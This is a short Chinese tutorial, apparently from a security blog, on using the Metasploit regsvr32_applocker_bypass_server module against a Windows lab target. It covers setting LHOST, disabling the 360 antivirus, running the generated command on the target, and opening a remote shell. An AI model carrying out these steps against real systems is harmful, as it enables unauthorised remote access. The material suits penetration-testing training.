Regsvr32漏洞利用

进入工具之后,输入命令查看是否存在可以利用的 
exp【regsvr32_applocker_bypass_server】 

image 105 - Regsvr32漏洞利用

使用exp【exploit/windows/misc/regsvr32_applocker_bypass_server】 
使用命令【show options】查看当前需要设置的参数 

image 106 - Regsvr32漏洞利用

设置本机IP【LHOST】 
运行 

image 107 - Regsvr32漏洞利用

将上图的红色框生成的内容,在靶机cmd下运行(360会屏蔽,需要关闭360防护) 

image 108 - Regsvr32漏洞利用

成功之后,会有如下图的显示,输入命令【sessions】查看是否生成session对话, 
在使用命令【sessions 1(id)】连接对话 

image 109 - Regsvr32漏洞利用

输入命令【shell】,即可进入靶机命令行下,执行系统命令成功 

image 110 - Regsvr32漏洞利用
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片